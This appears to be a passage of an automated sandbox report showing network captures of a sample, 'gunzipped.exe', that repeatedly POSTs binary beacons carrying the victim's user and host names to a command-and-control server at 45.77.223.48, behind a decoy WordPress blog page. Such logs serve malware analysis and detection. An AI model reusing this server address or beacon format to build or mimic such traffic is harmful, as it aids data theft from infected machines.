                                              Data Ascii: ><head><meta charset="
                                              Apr 26, 2024 04:57:23.610702038 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 26, 2024 04:57:23.610723019 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 26, 2024 04:57:23.610948086 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:23.620151043 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:23.620531082 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:23.620814085 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.44974945.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:23.949613094 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:24.135469913 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:25.019373894 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:24 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:25.019418001 CEST70INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
                                              Apr 26, 2024 04:57:25.019454002 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:25.037470102 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:25.038317919 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:25.038352966 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:25.038508892 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 26, 2024 04:57:25.038574934 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 26, 2024 04:57:25.038671970 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 26, 2024 04:57:25.038753986 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.44975245.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:25.359560966 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:25.548858881 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:26.395539999 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:25 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:26.395642042 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:26.395678997 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:26.403814077 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:26.404172897 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:26.404267073 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:26.404463053 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:26.404619932 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:26.404661894 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:26.404908895 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.44975445.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:26.717840910 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:26.902945995 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:27.786895990 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:26 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:27.787142038 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:27.787182093 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:27.796138048 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:27.796384096 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:27.796498060 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:27.796567917 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:27.796766996 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:27.796864986 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:27.796940088 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.44975645.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:28.121109962 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:28.307106018 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:29.217129946 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:28 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:29.217364073 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:29.218043089 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 26, 2024 04:57:29.218125105 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 26, 2024 04:57:29.218283892 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:29.228532076 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:29.229114056 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:29.229190111 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:29.229394913 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:29.229522943 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.44975745.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:29.559161901 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:29.746954918 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:30.692130089 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:30.692235947 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:30.710560083 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:30.710963964 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:30.711483955 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
